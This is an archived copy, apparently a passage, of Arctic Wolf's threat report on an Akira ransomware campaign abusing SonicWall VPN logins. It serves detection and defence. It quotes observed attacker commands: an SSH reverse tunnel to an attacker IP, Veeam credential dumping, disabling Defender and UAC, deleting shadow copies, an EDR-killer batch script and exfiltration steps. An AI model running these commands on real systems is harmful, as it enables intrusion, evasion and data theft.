{
	"id": "4d938884-2f24-4d09-88c8-b313a0903e93",
	"created_at": "2026-04-06T00:22:29.745329Z",
	"updated_at": "2026-04-10T03:35:21.49883Z",
	"deleted_at": null,
	"sha1_hash": "e97036fb6e296b37cf303f1b8310a41ca92dd59d",
	"title": "Smash and Grab: Aggressive Akira Campaign Targets SonicWall VPNs, Deploys Ransomware in an Hour or Less - Arctic Wolf",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 881733,
	"plain_text": "Smash and Grab: Aggressive Akira Campaign Targets SonicWall VPNs,\r\nDeploys Ransomware in an Hour or Less - Arctic Wolf\r\nBy Arctic Wolf Labs\r\nPublished: 2025-09-26 · Archived: 2026-04-05 16:06:21 UTC\r\nKey Takeaways\r\nIn late July 2025, Arctic Wolf® detected a surge of malicious activity targeting environments running SonicWall\r\nfirewalls—a campaign that remains active at the time of publication.\r\nThreat actors obtained initial access through malicious SSL VPN logins with successful OTP Multi-Factor\r\nAuthentication (MFA) challenge, and deployed Akira ransomware.\r\nEarly in the kill chain, anomalous SMB activity was observed, pointing to the use of Impacket for discovery and\r\nlateral movement.\r\nVictims span across multiple sectors, showing signs of opportunistic mass exploitation.\r\nBecause dwell time is typically measured in hours, detecting and disrupting the activity early is essential to prevent\r\nransomware encryption and data theft.\r\nSummary\r\nIn late July 2025, Arctic Wolf Labs began observing a surge of intrusions involving suspicious SonicWall SSL VPN activity.\r\nMalicious logins were followed within minutes by port scanning, Impacket SMB activity, and rapid deployment of Akira\r\nhttps://arcticwolf.com/resources/blog/smash-and-grab-aggressive-akira-campaign-targets-sonicwall-vpns/\r\nPage 1 of 29\n\nransomware. Victims spanned across multiple sectors and organization sizes, suggesting opportunistic mass exploitation.\r\nThis campaign has recently escalated, with new infrastructure linked to it observed as late as September 20, 2025.\r\nSonicWall links the malicious logins observed in this campaign to CVE-2024-40766, an improper access control\r\nvulnerability identified a year ago. From this perspective, credentials would have potentially been harvested from devices\r\nvulnerable to CVE-2024-40766 and later used by threat actors—even if those same devices were patched. 
Threat actors in\r\nthe present campaign successfully authenticated against accounts with the one-time password (OTP) MFA feature enabled.\r\nIt is worth noting that SonicWall recently disclosed an incident involving the MySonicWall cloud backup service. While\r\nSonicWall has stated the incident was not a ransomware event, the full extent of this breach may not yet be fully known. At\r\nthis time, there is no evidence linking the MySonicWall cloud backup file incident to the Akira ransomware campaign\r\ndescribed here.\r\nWith dwell times measured in hours rather than days—among the shortest we’ve recorded for ransomware—the window for\r\neffective response against this threat is exceptionally narrow. By detecting unexpected logins from a handful of hosting-related ASNs and identifying Impacket SMB activity over the network, intrusions can be disrupted at an early stage. We\r\npresent our findings here to help organizations protect against this ongoing threat.\r\nBackground\r\nIn September 2024, shortly after the disclosure of CVE-2024-40766, we observed a series of intrusions involving SonicWall\r\nSSL VPN services that resemble the tactics seen in the current campaign. As before, staging time in the current campaign is\r\ntypically measured in minutes rather than days or weeks, with malicious logins quickly followed by data exfiltration and\r\nAkira ransomware deployment if not promptly contained.\r\nAcross dozens of recent intrusions, some aspects of post-compromise tradecraft varied, suggesting the involvement of\r\nmultiple threat actors or affiliates. Despite these differences, several recurring elements appeared in most intrusions:\r\n1. VPN client logins originating from hosting providers\r\n2. Internal network scanning\r\n3. Impacket SMB activity tied to discovery\r\n4. Active Directory discovery\r\nIn the following sections, we will provide detailed technical insight into the intrusions that emerged in this campaign. 
Please\r\nnote that the techniques highlighted here represent a range of intrusions likely carried out by different affiliates.\r\nWhat We Know About the Intrusions\r\nScoping the Campaign\r\nThe campaign began on July 21, 2025, and remains active at the publication time of this research. We continue to investigate\r\nand respond to new attacks through our Managed Detection and Response (MDR) service.\r\nWhile we are not able to fully scope the SonicWall models and firmware versions affected by this campaign, our\r\ninvestigations revealed malicious SSL VPN logins on NSA and TZ series devices running SonicOS 6 and 7.\r\nSonicOS Version Release Month\r\n6.5.5.1-6n January 2025\r\n7.0.1-5065 April 2022\r\n7.0.1-5119 June 2023\r\n7.1.2-7019 August 2024\r\n7.1.3-7015 January 2025\r\n7.3.0-7012 July 2025\r\nSonicWall Hardware\r\nNSa 2600\r\nNSa 2700\r\nNSa 4650\r\nNSa 5700\r\nTZ370\r\nTZ470\r\nOn July 29, around the time the ransomware campaign began to intensify, SonicWall released SonicOS version 7.3.0. While\r\nSonicWall recommended that all customers update to benefit from new protections against brute force and MFA attacks,\r\nthere were intrusions affecting devices running version 7.3.0 as well. Additionally, researchers from cybersecurity company\r\nField Effect reported that firewalls running SonicOS versions as recent as 8.0.2 were affected.\r\nFollowing our outreach to SonicWall, a product notice was issued, suggesting that the current campaign may trace back to\r\nearlier exploitation of CVE-2024-40766, impacting SonicOS 5, 6, and 7. 
In this scenario, credentials stolen from vulnerable\r\nfirewalls could have been carried forward to newer SonicOS versions, leaving devices exposed even after firmware updates.\r\nAlthough the credential-based mitigations suggested by SonicWall are reasonable from a best practices standpoint, we are\r\nstill not able to explain how threat actors were able to successfully bypass MFA. We will demonstrate this bypass below.\r\nInitial Access\r\nA defining hallmark of these intrusions was the presence of SSL VPN logins originating from Virtual Private Server (VPS)\r\nhosting providers. While legitimate logins typically originate from broadband, SD-WAN, or SASE service providers, logins\r\nfrom VPS infrastructure are far less likely to be benign. In some intrusions, malicious access also originated from privacy\r\nVPNs, though this was less common.\r\nInitial access was not limited to local firewall accounts; LDAP-synchronized accounts were also targeted. Notably, in\r\nseveral intrusions the dedicated account used for Active Directory synchronization was observed logging in via SSL VPN,\r\ndespite not being intentionally configured for such access. In over half of the intrusions analyzed, we observed login\r\nattempts against accounts with the One Time Password (OTP) feature enabled. 
OTP is an MFA feature implemented within\r\nSonicOS.\r\nid=REDACTED_FW_NAME sn=REDACTED_SN time=\"2025-08-04 02:12:52\"\r\nfw=REDACTED_FW_IP pri=6 c=0 gcat=13 m=1153 src=0.0.0.0\r\ndst=38.114.123.167 msg=\"User : User needs one-time password\"\r\nn=11070\r\nTypically, less than a minute after an OTP challenge, a corresponding OTP login event is generated along the following\r\nlines:\r\nid=REDACTED_FW_NAME sn=REDACTED_SN time=\"2025-08-04 02:13:35\"\r\nfw=REDACTED_FW_IP pri=6 c=0 gcat=13 m=1153 srcV6=:: dstV6=::\r\nmsg=\"User REDACTED_USERNAME: otp login\" n=11071\r\nAn ‘SSL VPN zone remote user login allowed’ (event ID 1080) message typically appears after successful\r\nusername/password validation and OTP authentication (when enabled), followed by device profile matching and IP\r\nassignment events.\r\nid=REDACTED_FW_NAME sn=REDACTED_SN time=\"2025-08-04 02:13:35\"\r\nfw=REDACTED_FW_IP pri=6 c=0 gcat=4 m=1080 msg=\"SSL VPN zone\r\nremote user login allowed\" src=38.114.123[.]167::X1\r\ndst=REDACTED_PUBLIC_IP::X3 usr=\"REDACTED_USERNAME\"\r\nsess=\"sslvpnc\" dur=0 note=\"User: REDACTED_USERNAME\" n=121\r\nid=REDACTED_FW_NAME sn=REDACTED_SN time=\"2025-08-04\r\n02:13:35\" fw=REDACTED_FW_IP pri=6 c=0 gcat=13 m=1153\r\nsrc=REDACTED_INTERNAL_IP dst=0.0.0.0 msg=\"User\r\nREDACTED_USERNAME: SSLVPN client matched device profile\r\nDefault Device Profile for Windows\" n=11072\r\n \r\nid=REDACTED_FW_NAME sn=REDACTED_SN time=\"2025-08-04\r\n02:13:17\" fw=REDACTED_FW_IP pri=6 c=0 gcat=13 m=1153\r\nsrc=REDACTED_INTERNAL_IP dst=38.114.123[.]167\r\nusr=\"REDACTED_USERNAME\" sess=\"sslvpnc\" msg=\"User\r\nREDACTED_USERNAME: is assigned IP: REDACTED_INTERNAL_IP\"\r\nn=11073\r\nWhat About MFA?\r\nWhile publicly known details are limited around the scope of CVE-2024-40766, SonicWall’s August 2025 product notice\r\nconfirmed that exploitation could 
enable abuse of administrative functions such as configuration backup, creating\r\nopportunities for credential-based attacks.\r\nSonicWall has also confirmed that devices running versions of SonicOS prior to 7.3 may have been susceptible to brute\r\nforce attacks affecting MFA credentials. While MFA is intended to thwart credential-based attacks, it can still be attacked\r\nunder certain circumstances. For example, Google Threat Intelligence Group recently uncovered a campaign affecting\r\nSonicWall SMA demonstrating that if OTP seeds are obtained by threat actors, they can be used to generate valid OTP\r\ntokens.\r\nCredential-based attacks are well established in ransomware; threat actors affiliated with Black Basta, for example, have\r\nbeen known to conduct online brute-force campaigns against live firewall appliances and servers running Remote Desktop\r\nProtocol (RDP). Additionally, offline hash cracking offers anonymity and avoids rate limits imposed by live appliances.\r\nSimilar considerations apply to credentials stolen in this campaign.\r\nIn our investigation, we observed repeated malicious SSL VPN logins on accounts with OTP MFA enabled, ruling out\r\nscratch code usage in those cases. We also found no signs of malicious use of the compromised accounts prior to SSL VPN\r\nlogin (event ID 1080), nor did we observe unauthorized OTP unbinding events or other malicious configuration changes\r\n(event ID 1382) in the five days leading up to the intrusions. Taken together, the evidence points to the use of valid\r\ncredentials rather than modification of OTP configuration, though the exact method of authenticating against MFA-enabled\r\naccounts remains unclear.\r\nHints of Automated Exploitation\r\nIn some instances, multiple login events were observed in quick succession across a variety of accounts, with repeated\r\nsuccessful logins tied to the same VPN client IP address. 
This evenly spaced periodic activity is not typical of legitimate use\r\nand raises the possibility of automated authentication against compromised accounts through scripting.\r\nPeriodic access of this nature was not consistently observed across all intrusions, however; in most instances, one to two\r\nSSL VPN accounts were maliciously accessed.\r\nFigure 1: Malicious SSL VPN login activity spaced out over consistent intervals across multiple user accounts, all\r\noriginating from the same client IP address.\r\nDiscovery and Lateral Movement\r\nUpon gaining SSL VPN access, threat actors wasted no time in attempting lateral movement through compromised\r\nenvironments, typically initiating internal scanning within five minutes of logging in. Although early scanning originated\r\nfrom VPN client IP addresses, tools such as SoftPerfect Network Scanner and Advanced IP Scanner were also deployed in\r\nsome instances to Windows servers under the %Temp%, Downloads, or Desktop directories.\r\nC:\\\\Users\\\\REDACTED\\\\AppData\\\\Local\\\\Temp\\\\3\\\\Advanced IP\r\nScanner 2\\\\advanced_ip_scanner.exe\r\nScanned ports included 135 (RPC), 137 (Netbios), 445 (SMB), and 1433 (SQL). Along with this internal scanning activity,\r\nSMBv2 session setup requests were observed, exhibiting a signature consistent with use of the Python Impacket library. 
The\r\nhostnames observed in these SMB events included:\r\nkali\r\nWIN\r\nDESKTOP-HPLM2TD\r\nWINUTIL\r\nDESKTOP-A2S6P81\r\nWIN-V1L65ED9I55\r\nWIN-5VVC95LFP2G\r\nDESKTOP-EDE0RR5\r\nSome of these same hostnames were observed in the following types of activity:\r\nFailed SMB network logins: event ID 4625 (logon type 3)\r\nSuccessful SMB network logins: event ID 4624 (logon type 3)\r\nRDP login activity: event ID 4624 (logon type 10)\r\nRDP was the tool of choice for lateral movement through compromised environments.\r\nFurther evidence of Impacket usage was found in the form of quser commands with output redirected to a filename with a\r\nsix-character randomized string in mixed case, consistent with WMIExec usage.\r\nC:\\Windows\\System32\\cmd.exe /Q /c quser 1\u003e\r\n\\Windows\\Temp\\RANDOMIZED_STRING 2\u003e\u00261\r\nActive Directory Enumeration\r\nDiscovery of Active Directory (AD) objects was conducted through built-in tools such as nltest, dsquery, and the PowerShell\r\nGet-ADUser and Get-ADComputer cmdlets.\r\nGet-ADUser -Filter * -Properties * | Select-Object Enabled, CanonicalName,\r\nCN, Name, SamAccountName, MemberOf, Company, Title, Description, Created,\r\nModified, PasswordLastSet, LastLogonDate, logonCount, Department,\r\ntelephoneNumber, MobilePhone, OfficePhone, EmailAddress, mail,\r\nHomeDirectory, homeMDB \u003e C:\\ProgramData\\AdUsers.txt\r\nGet-ADUser -Filter * -Properties * | Select-Object Enabled, CanonicalName,\r\nCN, Name, SamAccountName, MemberOf, Company, Title, Description, Created,\r\nModified, PasswordLastSet, LastLogonDate, logonCount, Department,\r\ntelephoneNumber, MobilePhone, OfficePhone, EmailAddress, mail,\r\nHomeDirectory, homeMDB \u003e\u003e C:\\ProgramData\\REDACTED_Users.txt\r\nGet-ADComputer -Filter * -Property * | Select-Object Enabled, Name,\r\nDNSHostName, IPv4Address, OperatingSystem, Description, 
CanonicalName,\r\nservicePrincipalName, LastLogonDate, whenChanged, whenCreated \u003e\u003e\r\nC:\\ProgramData\\REDACTED_Comps.txt\r\nFor share enumeration, SharpShares (a multi-threaded open-source AD reconnaissance tool) was used.\r\nC:\\programdata\\SharpShares.exe /ldap:all /filter:netlogon,ipc$,print$\r\n/threads:1000 /outfile:C:\\programdata\\tb.txt\r\nNOTEPAD.EXE C:\\ProgramData\\tb.txt\r\nFurther enumeration was conducted using tools such as NetExec, BloodHound, and ldapdomaindump. In some instances,\r\nthreat actors reviewed the outputs of such tools in notepad.\r\nExtracting VM credentials\r\nOne of the threat actor’s goals was to gain access to virtual machine (VM) storage and backups. In principle, achieving this\r\nwould provide threat actors with access to sensitive data as well as domain credentials stored in the filesystem of domain\r\ncontrollers. However, in the majority of observed intrusions, administrator access was obtained through other means prior to\r\nVM credential extraction.\r\nIn some instances, the sqlcmd utility was used to access Veeam Backup \u0026 Replication credentials stored in a SQL server,\r\nrunning as a domain administrator account.\r\nsqlcmd -S localhost\\REDACTED_USERNAME -E -y500 -s \";\" -Q\r\n\"SELECT * FROM [VeeamBackup].[dbo].[Credentials];\"\r\nWe also observed execution of a previously unseen PowerShell script that automated the process of credential extraction\r\nfrom the Veeam database, supporting both MSSQL and PostgreSQL backends. The PowerShell script is commented and\r\nprovides color-coded output for success and failure. 
It demonstrates the ability to extract encrypted credentials from versions\r\n11 and 12 of Veeam Backup \u0026 Replication, with support for decrypting DPAPI secrets stored on the local machine, as well\r\nas newer Base64-encoded formats.\r\nNewer versions of Veeam use an encryption salt—random data fed as an additional input to a one-way function that hashes\r\ndata, a password or passphrase. The script attempts to retrieve the necessary salt for decryption where applicable, searching\r\nthrough several filesystem locations.\r\nFigure 2: The Get-EncryptionSalt PowerShell function retrieves the encryption salt from the file system, checking multiple\r\npotential storage locations. (For a full source file, see the Appendix.)\r\nNotably, if a PostgreSQL Veeam installation is detected, the credential recovery script attempts to temporarily modify the\r\ndatabase configuration to allow connections from all loopback interfaces for IPv4 and IPv6. This configuration change\r\nincludes a comment in the modified configuration of “# Veeam Credential Recovery – Temp Trust Rules [Added $(Get-Date)]”, where the Get-Date cmdlet populates the date at the time of script execution. Upon completion of script execution,\r\na backup version of the PostgreSQL configuration is restored.\r\nFigure 3: The Enable-PgTrustAuth PowerShell function is used to temporarily allow PostgreSQL administrative connections\r\nfrom any IPv4 or IPv6 address, backing up the original configuration before applying changes. 
(For a full source file, see\r\nthe Appendix.)\r\nFor both MSSQL and PostgreSQL, only the user_name, password, and description fields are selected when retrieving\r\ncredentials, in contrast with the sqlcmd activity described earlier.\r\nFigure 4: Veeam credentials stored in the database are retrieved, with different queries depending on whether PostgreSQL\r\nor MS SQL is used. (For a full source file, see the Appendix.)\r\nPersistence and C2\r\nThreat actors were observed creating local administrator accounts using net.exe on VM backup servers hosting applications\r\nsuch as Veeam Backup \u0026 Replication, as well as other Windows servers related to VM administration, using account names\r\nlike sqlbackup and veean, to blend into the environment.\r\nThreat actors also created domain accounts, elevating some to administrative groups like ESX Admins. These accounts were\r\nlater used for data exfiltration and to install RMM tools, including AnyDesk and TeamViewer.\r\nnet user sqlbackup REDACTED /add\r\nnet localgroup administrators sqlbackup /add\r\nnet group \"ESX Admins\" REDACTED_USERNAME /domain /add\r\nrunas /netonly /user:REDACTED_DOMAIN\\REDACTED_USERNAME cmd\r\nAs an example, an AnyDesk installer was downloaded to ProgramData using PowerShell:\r\n\"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -command\r\n\"(new-object\r\nSystem.Net.WebClient).DownloadFile('hxxp://download[.]anydesk[.]com/AnyDesk\r\n.exe';, 'C:\\ProgramData\\AnyDesk.exe')\"\r\nWe also observed some instances of the open source RustDesk RMM tool being installed by threat actors using a batch\r\nscript:\r\n\"C:\\Windows\\System32\\cmd.exe\" /C\r\nC:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\RustDesk_install.bat\r\nsc create RustDesk binpath= \"\\\"C:\\Program 
Files\\RustDesk\\RustDesk.exe\\\"\r\n--import-config\r\n\\\"C:\\Users\\Administrator\\AppData\\Roaming\\RustDesk\\config\\RustDesk.toml\\\r\n\"\" start= auto DisplayName= \"RustDesk Service\"\r\nAs seen in previous campaigns, SSH reverse tunnels were used in several instances as a persistence mechanism, spawning\r\nfrom an interactive cmd prompt:\r\nssh -R 5555 root@170.130.165[.]42\r\nThese commands were typically executed under a domain account recently created by the threat actor.\r\nIn other cases, cloudflared, the open source Cloudflare Tunnel client, was used to bypass the NAT, running from Active\r\nDirectory domain controllers. This presumably was done to provide access to the compromised network via SSH, judging by\r\nthe path that the cloudflared software was installed under: C:\\ProgramData\\ssh. To facilitate remote access, the OpenSSH\r\nservice was configured to listen on the wildcard address of 0.0.0.0.\r\nThe following commands were used to establish the tunnel, configure the host-based firewall, and install a persistent service.\r\nC:\\ProgramData\\ssh\\cloudflared[.]exe.exe tunnel run --token\r\nREDACTED_BASE64_TOKEN\r\nNew-NetFirewallRule -Name sshd -DisplayName 'OpenSSH Server\r\n(sshd)' -Enabled True -Direction Inbound -Protocol TCP -Action\r\nAllow -LocalPort 22\r\n \r\ncloudflared[.]exe service install REDACTED\r\n_BASE64_TOKEN\r\nIn some instances, we observed a PowerShell script that automated the process of installing cloudflared as a service. The\r\nPowerShell script included comments such as “Alternative download URLs in case GitHub is blocked”, although only\r\nGitHub download URLs were provided. 
Downloads were attempted using the built-in Invoke-WebRequest cmdlet, falling\r\nback to Start-BitsTransfer if the initial download was unsuccessful.\r\nThe script then attempts to install both the MSI and executable versions of cloudflared and wraps up with the installation of\r\na corresponding service using the working directory of the script as the destination. Interestingly, the command line\r\ninvocation of msiexec configures a log file to be captured for the MSI installation, which is saved in ProgramData with the\r\nfilename cloudflared_msi_install.log.\r\nFigure 5: A PowerShell script that retrieves the Cloudflare Tunnel installer file and installs it silently.\r\nDefense Evasion\r\nThreat actors attempted to hamper the response of IT staff and other defenders by disabling legitimate RMM tools such as\r\nSplashtop on servers they were interacting with, such as VM storage and backup servers. Volume Shadow Copy snapshots\r\nwere deleted to impair the ability to restore data from backups, using the deprecated Get-WmiObject and Remove-WmiObject PowerShell cmdlets.\r\npowershell.exe -Command Get-WmiObject Win32_Shadowcopy | Remove-WmiObject\r\nThreat actors were observed disabling User Account Control (UAC) for local accounts using the\r\nLocalAccountTokenFilterPolicy registry key. 
This allowed remote use of full admin rights for local accounts.\r\nreg add\r\n\\\"HKEY_LOCAL_MACHINE\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Pol\r\nicies\\\\System\\\" /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f\r\nAcross multiple instances, threat actors attempted to disable endpoint detection and response (EDR) tooling and Windows\r\nDefender.\r\nSet-MpPreference -DisableRealtimeMonitoring $true -\r\nDisableBehaviorMonitoring $true -DisableArchiveScanning $true -\r\nDisableScriptScanning $true -DisableBlockAtFirstSeen $true -\r\nDisableIOAVProtection $true -MAPSReporting Disabled -\r\nSubmitSamplesConsent 2\r\nThreat actors also evaded defenses using the bring-your-own-vulnerable-driver (BYOVD) technique. They repackaged\r\nMicrosoft’s consent.exe and ran it from directories disguised as legitimate EDR software. These binaries were often\r\nexecuted from unusual filesystem locations, typically named after a legitimate EDR solution or other legitimate software as\r\na disguise:\r\nC:\\Users\\Administrator\\Desktop\\New folder\\CrowdStrike\\consent.exe\r\nC:\\Users\\Administrator\\Downloads\\Sentinel\\Sentinel\\consent.exe\r\nC:\\programdata\\knowbe4\\adisync\\config\\sentinel\\sentinel\\consent.exe\r\nC:\\ProgramData\\AADConnect\\Sentinel\\Sentinel\\consent.exe\r\nC:\\ProgramData\\HP\\Installer\\Sentinel\\Sentinel\\consent.exe\r\nIn some instances, threat actors utilized a RAR archive named “sentsoph.rar” containing folders named “Sophos” and\r\n“Sentinel”. Each of those two folders contained consent.exe, a Windows batch file to clear event logs\r\n(clean_log_admin.bat), and a DLL file named wmsgapi.dll or msimg32.dll. 
This DLL file is then used to load a vulnerable\r\ndevice driver (often named rwdrv.sys or churchill_driver.sys) located in %temp% with the goal of disabling EDR.\r\nC:\\Users\\Admin\\AppData\\Local\\Temp\\churchill_driver.sys\r\nC:\\Users\\Admin\\AppData\\Local\\Temp\\rwdrv.sys\r\nOne additional batch file was also observed within some of the RAR archives, serving as a check to identify if the device is\r\nrunning in a Hyper-V environment. Hyper-V is Microsoft’s enterprise-grade hypervisor, providing hardware virtualization\r\ncapabilities that enable organizations to create, manage, and run virtual machines at scale. If a registry key for hypervisor-protected code integrity (HVCI) feature exists, the batch file instructs the threat actor using it to proceed with running an\r\nEDR killer.\r\n@echo off\r\nsetlocal\r\n:: Check if the HVCI registry key exists\r\nreg query\r\n\"HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\DeviceGuard\\Scenarios\r\n\\HypervisorEnforcedCodeIntegrity\" \u003e nul 2\u003e\u00261\r\nif %ERRORLEVEL% neq 0 (\r\n echo HVCI registry key does not exist. HVCI is NOT enabled. ALL IS GOOD!\r\n exit /b\r\n)\r\n:: Check the value of the key\r\nfor /f \"tokens=2*\" %%A in ('reg query\r\n\"HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\DeviceGuard\\Scenarios\r\n\\HypervisorEnforcedCodeIntegrity\" /v \"Enabled\"') do (\r\n set value=%%B\r\n)\r\nif \"%value%\"==\"0x1\" (\r\n echo HVCI is ENABLED on this system. DONT RUN THE KILLER.\r\n) else (\r\n echo HVCI is NOT ENABLED on this system. FUCK IT RIGHT NOW.\r\n)\r\npause\r\nThe consent.exe executables had valid Authenticode digital signatures and were signed by Microsoft, revealed by its version\r\nmetadata to be part of the Microsoft Windows 7 SP1 operating system. 
In this EDR bypass mechanism, consent.exe acts as a\r\nlauncher, which requests administrator privileges before loading a malicious DLL named msimg32.dll or wmsgapi.dll.\r\nThis malicious DLL was packed, potentially with Movfuscator or a similar tool, and employs anti-debugging techniques to\r\nhamper analysis. All these files had been archived in a RAR archive bearing the same filename as the folders they were\r\ncreated in (e.g., Sentinel.rar).\r\nOne of the first checks performed by the malicious DLL queries the system locale with GetSystemDefaultLocaleName(),\r\nterminating execution if the result matches a long list of hardcoded Eastern European and Central Asian locales. This\r\ngeofencing technique is a common practice observed in other targeted ransomware attacks, although more often observed\r\nlater in the kill chain at the level of the ransomware encryptor binary itself. We include a full list of these excluded locales in\r\nthe appendix.\r\nOnce active, the malicious DLL drops two kernel drivers into the Windows %temp% directory. The first driver, rwdrv.sys, is\r\na vulnerable but legitimate driver used for privilege escalation and kernel access. The second driver, hlpdrv.sys,\r\ncommunicates with the malicious DLL to receive targeted process information. Using IRP packets, the malware identifies\r\nspecific security processes (e.g., MsMpEng.exe and SecurityHealthService.exe) and then weaponizes Windows Access\r\nControl Lists (ACLs) at the kernel level to disable them.\r\nFigure 6: SysInternals DebugView output showing a malicious driver being loaded and ACL tampering to disable security\r\nprocesses.\r\nThe hlpdrv.sys driver calls ZwCreateFile() with the WRITE_DAC flag, enabling it to rewrite a file’s security descriptor. 
It\r\nthen constructs an empty ACL using RtlCreateAcl(), sets this into a new security descriptor, and applies it to the target with\r\nZwSetSecurityObject(). The net result is the ability to render a file or process path completely inaccessible in user mode,\r\neffectively neutering security software without directly killing processes or deleting files.\r\nFigure 7: Error message showing Windows Defender’s core process (MsMpEng.exe) being blocked after ACL tampering by\r\nthe malicious driver.\r\nData Staging and Exfiltration\r\nThreat actors used WinRAR to package files for exfiltration. To do this, they placed WinRAR installers on file servers,\r\ndomain controllers, and other systems running Windows Server OS. In some instances, the WinRAR installation binary was\r\nplaced in the ProgramData directory.\r\nC:\\ProgramData\\winrar-x64-712.exe\r\nThese are the command switches that were used by the threat actor to archive data being staged for exfiltration:\r\na – Add files to archive. Creates a new archive or adds to an existing one.\r\nm0 – Files are stored without compression.\r\nv3g – Splits archive into 3 GB chunks.\r\ntn365d – Only archives files from the past year.\r\nn*.txt -n*.pdf… – Only archives text files, PDF files, Office files, and database files.\r\nwinrar.exe a -m0 -v3g -tn365d -n*.txt -n*.pdf -n*.xls -n*.doc -n*.xlsx\r\n-n*.docx -n*.BAK -n*.MDB \"C:\\Data\" \"\\\\\"\u003credacted\u003e\"\r\nThreat actors were observed extracting the rclone binary from a zip file using WinRAR. They then proceeded to exfiltrate\r\nvictim data using rclone to virtual private server infrastructure.\r\n\"C:\\Program Files\\\\WinRAR\\\\WinRAR.exe\\\" x -iext -ver -imon1 --\r\n\"C:\\ProgramData\\rclone.zip\" C:\\ProgramData\\rclone\\\r\nC:\\ProgramData\\rclone\\rclone.exe\r\nIn other instances, FileZilla was the tool of choice for exfiltration. 
FileZilla was installed to the standard Program Files\r\nlocation.\r\nC:\\Users\\REDACTED\\Downloads\\FileZilla_3.69.2_win64_sponsored2-\r\nsetup.exe\r\nC:\\Program Files\\FileZilla FTP Client\\fzsftp.exe\r\nUsing the FileZilla sftp client fzsftp.exe, RAR archives were transferred by the threat actor over SSH to a VPS server under\r\ntheir control.\r\nRansomware Encryption\r\nRansomware was deployed while specifying the drive of the targeted device as well as a text file of all the connected\r\nnetwork shares in a separate command.\r\nakira.exe -n=1 -p=D:\\\\\r\nakira.exe -n=1 -s=share.txt\r\nIn other instances, ransomware deployment was mapped to the executable locker.exe and executed in a command per drive\r\nencrypted.\r\nlocker.exe -p=F:\\\\ -n=5\r\nlocker.exe -p=G:\\\\ -n=5\r\nThe ransomware encryptor binary was deployed to multiple locations, including C:\\lock and C:\\ProgramData. Binary\r\nfilenames included akira.exe, locker.exe, and w.exe.\r\nIn almost all intrusions, ransomware encryption took place in under four hours from initial access, with a staging interval as\r\nshort as 55 minutes in some instances.\r\nRecommendations\r\nEarly in this campaign, Arctic Wolf issued a security bulletin warning customers and the broader industry about the uptick in\r\nmalicious SonicWall SSL VPN logins that we observed. We have since updated our bulletin to incorporate SonicWall’s latest\r\nrecommendations.\r\nThe most crucial mitigation to this threat is to reset all SSL VPN credentials on SonicWall devices that have ever run\r\nfirmware vulnerable to CVE-2024-40766, as well as Active Directory credentials on accounts used for SSL VPN access and\r\nLDAP synchronization.\r\nOrganizations should also consider SonicWall’s guidance on the MySonicWall cloud backup file incident and determine on a\r\ncase-by-case basis if any serial numbers were affected. 
While SonicWall has stated that this incident was not a ransomware\r\nevent, the remediation instructions and credential reset procedure are similar to that of CVE-2024-40766. Organizations\r\nusing the MySonicWall cloud backup feature are strongly advised to reset credentials as instructed by SonicWall.\r\nEarly detection is critical in this campaign, and to that end we recommend monitoring for hosting-related ASNs in\r\nSonicWall SSL VPN logins. Additionally, monitoring for SMB session setup requests consistent with Impacket provides an\r\nearly kill chain detection for discovery activity related to this campaign.\r\nAs a best practice, if your organization does not conduct business in specific regions, block VPN logins originating from\r\nthose countries outright. This reduces the attack surface for opportunistic exploitation campaigns such as this one.\r\nFinally, consider blocking logins from infrastructure linked to virtual private servers (VPS) hosting providers and\r\nanonymization services. These IP ranges are frequently abused for credential-stuffing and brute-force attacks, while\r\nlegitimate business use is rare.\r\nArctic Wolf did not observe malicious logins of accounts using SSO/SAML for VPN authentication. This suggests that\r\nseparating identity management from firewall appliances can reduce risk and should be considered as a hardening strategy.\r\nHow Arctic Wolf Protects Its Customers\r\nArctic Wolf is committed to ending cyber risk, and when new ransomware campaigns are identified we act decisively to\r\nprotect our customers. 
Arctic Wolf already had detections in place for the core techniques employed in this campaign before\r\nit began, and we were therefore able to detect and respond early and effectively on behalf of our customers.\r\nAdditionally, as always, we have incorporated the new threat intelligence collected from this SonicWall SSL VPN\r\nransomware campaign to augment and improve the detection capabilities of our platform.\r\nDetection Opportunities\r\nAs part of our Managed Detection and Response (MDR) service, Arctic Wolf has detections in place for the techniques\r\ndescribed in this blog, in addition to other techniques employed by the same ransomware threat actors to whom this\r\ncampaign has been attributed.\r\nFirewall\r\nDuring our investigations, we observed threat actors logging into SonicWall SSL VPN accounts via a handful of hosting-related ASNs. In situations where organizations don’t have a valid business reason to allow logins from these specific ASNs,\r\nlogin attempts can be blocked outright or otherwise used for detection purposes.\r\nIP classification services may provide avenues for blocking logins from hosting-related ASNs altogether, although some\r\nexceptions may be needed depending on the use of legitimate services such as SD-WAN or SASE providers.\r\nNetwork\r\nWe observed LDAP discovery activity and Impacket SMBv2 session setup requests; network-based detection opportunities\r\nare available for both.\r\nEndpoint\r\nThe threat actors in this campaign relied heavily on tools used from specific locations such as ProgramData and Downloads.\r\nExecution of network scanning tools and archival tools like WinRAR from unusual locations on servers should be\r\nconsidered suspicious.\r\nAdditionally, App Control for Business (formerly known as WDAC) provides a means of blocking dual use applications\r\nleveraged by threat actors in this campaign. 
As an example, see our previous publication on blocking dual-use tools\r\nassociated with Iranian threat activity via WDAC rules. While full implementation of such a policy is beyond the scope of\r\nthis article, the following categories of rules can be considered:\r\n1. Deny execution from untrusted paths: Block EXE/DLL/SYS/MSI/script execution from user-writable directories\r\nsuch as %ProgramData%, %TEMP%, %Users%\\Downloads, and %PUBLIC%. Allow only explicitly approved\r\nupdaters where necessary.\r\n2. Restrict executed code to trusted publishers: Only permit execution of signed code from approved vendors and\r\nproduct families.\r\n3. Enforce kernel-mode code integrity: Prevent unsigned or known-vulnerable drivers (e.g., rwdrv.sys and churchill_driver.sys\r\nfrom this campaign) from loading, even with administrative rights.\r\n4. Block unauthorized remote tools: Explicitly deny execution of RMM and tunneling utilities (AnyDesk, RustDesk,\r\nCloudflared) unless explicitly sanctioned and allowlisted.\r\nConclusion\r\nThe threats described in this campaign demand early detection and a rapid response to avoid catastrophic impact to\r\norganizations. 